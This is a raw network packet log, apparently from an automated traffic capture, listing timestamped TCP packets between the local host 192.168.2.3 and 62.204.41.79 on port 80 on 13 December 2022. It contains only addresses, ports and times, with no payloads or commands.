                                              Dec 13, 2022 20:09:13.969402075 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.969536066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.969696999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.969835043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.969964027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.970096111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.970232010 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.970365047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.970499992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.970633030 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.970768929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.970933914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.971060991 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.971194029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.971338987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.971478939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.971611977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.973890066 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.974097967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.974241972 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.974400997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.974548101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.974689007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.974828959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.975028992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.975177050 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.975370884 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.975987911 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.976155996 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.976288080 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.976488113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.976613998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.976736069 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.976866007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.976994038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.977124929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.977267027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.977400064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.977529049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.977659941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.977790117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.977929115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.978055954 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.978190899 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.978327036 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.978456974 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.978590965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.978724957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.978970051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.979116917 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.979249001 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.979389906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.979516029 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.979643106 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.979752064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.979876995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980000019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980123997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980257034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980389118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980524063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980657101 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980787992 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.980912924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.981038094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.981173038 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.981291056 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.981416941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.981553078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.981682062 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.983804941 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.983957052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984082937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984204054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984323978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984446049 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984561920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984682083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984796047 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.984916925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.985042095 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.985167027 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.988347054 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.988437891 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.988543987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.988631964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.988727093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.988825083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.988919973 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989012957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989121914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989219904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989312887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989407063 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989506960 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989595890 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989690065 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989792109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989877939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.989970922 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990072966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990181923 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990278959 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990371943 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990469933 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990562916 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990658998 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990752935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990847111 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.990958929 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.991055965 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.991152048 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.992394924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.992579937 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.992681026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.992780924 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.992885113 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.992980003 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.993076086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.993165970 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.993261099 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.993351936 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:13.993444920 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.000184059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000211000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000307083 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000376940 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000523090 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000576019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000616074 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000696898 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.000901937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.001018047 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.001179934 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.001257896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.001420975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.001497984 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.004213095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.004235029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.004247904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.004307032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.004437923 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.004765987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.004781961 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005053997 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005070925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005189896 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005265951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005304098 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005481005 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005553007 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005724907 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005740881 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.005832911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006037951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006056070 CET804973562.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006102085 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006161928 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.006266117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006356001 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006370068 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006509066 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006654978 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006730080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.006973982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007020950 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007184029 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007302999 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007337093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007540941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007570028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007719994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007812977 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.007894993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008013010 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008136034 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008214951 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008497953 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008549929 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008564949 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008614063 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008817911 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008964062 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.008979082 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.009098053 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.009215117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.009296894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.009462118 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.009540081 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.009737968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.009773970 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.011327982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.011496067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.011630058 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.011763096 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.011893034 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012023926 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012151957 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012279987 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012411118 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012542963 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012672901 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012797117 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.012803078 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.012820959 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.012835979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.012940884 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.013010979 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.013098955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.013124943 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.013175964 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.013310909 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.013442993 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.013518095 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.013534069 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.013613939 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.013755083 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.013792038 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.013858080 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.013919115 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.014062881 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.014101028 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.014194012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.014323950 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.014422894 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.014465094 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.014667988 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.014842033 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.014960051 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.015090942 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.015223026 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.015358925 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.015496016 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.015631914 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.015696049 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.015727043 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.015742064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.015769958 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.015822887 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.015842915 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.015983105 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.016021013 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016037941 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016134977 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.016176939 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016289949 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.016426086 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.016501904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016551018 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016581059 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.016585112 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016741037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016829967 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.016856909 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.016998053 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.017025948 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.017153978 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.017285109 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.017419100 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.017543077 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.017693043 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.017816067 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.017947912 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.018078089 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.018207073 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.018341064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.019666910 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.019747019 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.019953966 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.020226955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.020256042 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.020549059 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.020745993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.020819902 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.020941973 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.020956993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021018982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021183968 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021608114 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021624088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021637917 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021652937 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021740913 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021819115 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021939993 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.021975994 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026032925 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026058912 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026072979 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026139975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026221037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026381016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026592016 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026627064 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026659012 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026740074 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026789904 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.026894093 CET4973580192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027014017 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027029037 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027118921 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027209997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027234077 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027265072 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027302027 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027338982 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027467012 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027475119 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027493000 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027595997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027708054 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027709007 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027725935 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027740955 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027818918 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027868032 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.027932882 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.027944088 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.028038025 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.028064966 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028146982 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.028207064 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028301954 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.028337002 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028474092 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028501987 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.028578997 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028682947 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028791904 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028841972 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.028928995 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.028949976 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.029052019 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029071093 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.029181004 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029305935 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029370070 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.029424906 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029503107 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.029535055 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029639006 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029758930 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029784918 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.029889107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.029989004 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.030019999 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.030020952 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.030148983 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.030265093 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.030308962 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.030388117 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.030395031 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.030486107 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.030621052 CET4973680192.168.2.362.204.41.79
                                              Dec 13, 2022 20:09:14.030646086 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.030704975 CET804973662.204.41.79192.168.2.3
                                              Dec 13, 2022 20:09:14.030744076 CET4973680192.168.2.362.204.41.79
